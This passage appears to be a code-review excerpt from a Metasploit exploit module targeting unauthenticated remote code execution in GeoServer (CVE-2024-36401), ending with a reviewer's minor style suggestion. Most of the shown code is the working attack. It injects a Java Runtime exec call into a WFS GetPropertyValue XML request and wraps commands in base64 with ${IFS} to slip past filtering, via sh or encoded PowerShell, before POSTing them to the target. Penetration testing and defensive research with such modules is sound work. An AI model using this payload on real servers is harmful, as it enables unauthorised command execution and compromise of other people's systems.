modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb

```diff
@@ -0,0 +1,206 @@
+
+    html = res.get_html_document
+    unless html.blank?
+      # html identifier for Geoserver version information: <span id="version">2.23.2</span>
+      version = html.css('span[id="version"]')
+      return Rex::Version.new(version[0].text) unless version[0].nil?
+    end
+    nil
+  end
+
+  def get_valid_featuretype
+    allowed_feature_types = ['sf:archsites', 'sf:bugsites', 'sf:restricted', 'sf:roads', 'sf:streams', 'ne:boundary_lines', 'ne:coastlines', 'ne:countries', 'ne:disputed_areas', 'ne:populated_places']
+    res = send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
+      'method' => 'GET',
+      'ctype' => 'application/xml',
+      'keep_cookies' => true,
+      'vars_get' => {
+        'request' => 'ListStoredQueries',
+        'service' => 'wfs'
+      }
+    })
+    return nil unless res && res.code == 200 && res.body.include?('ListStoredQueriesResponse')
+
+    xml = res.get_xml_document
+    unless xml.blank?
+      xml.remove_namespaces!
+      # get all the FeatureTypes and store them in an array of strings
+      retrieved_feature_types = xml.xpath('//ReturnFeatureType')
+      # shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer
+      # return the feature type if a match is found in the allowed_feature_types array
+      retrieved_feature_types.to_a.shuffle.each do |feature_type|
+        return feature_type.text if allowed_feature_types.include?(feature_type.text)
+      end
+    end
+    nil
+  end
+
+  def create_payload(cmd)
+    # get a valid feature type and fail back to a default if not successful
+    feature_type = get_valid_featuretype
+    feature_type = 'sf:archsites' if feature_type.nil?
+
+    case target['Type']
+    when :unix_cmd || :linux_dropper
+      # create customised b64 encoded payload
+      # 'Encoder' => 'cmd/base64' does not work in this particular use case
+      cmd_b64 = Base64.strict_encode64(cmd)
+      cmd = "sh -c echo${IFS}#{cmd_b64}|base64${IFS}-d|sh"
+    when :win_cmd
+      enc_cmd = Base64.strict_encode64("cmd /C --% #{payload.encoded}".encode('UTF-16LE'))
+      cmd = "powershell.exe -e #{enc_cmd}"
+    end
+
+    return <<~EOS
+      <wfs:GetPropertyValue service='WFS' version='2.0.0'
+        xmlns:topp='http://www.openplans.org/topp'
+        xmlns:fes='http://www.opengis.net/fes/2.0'
+        xmlns:wfs='http://www.opengis.net/wfs/2.0'>
+          <wfs:Query typeNames="#{feature_type}"/>
+          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{cmd}")</wfs:valueReference>
+      </wfs:GetPropertyValue>
+    EOS
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
+      'method' => 'POST',
+      'ctype' => 'application/xml',
+      'keep_cookies' => true,
+      'data' => create_payload(cmd).to_s
```

Comment:
I think this can be removed as `create_payload` should always return a string.
```suggestion
      'data' => create_payload(cmd)
```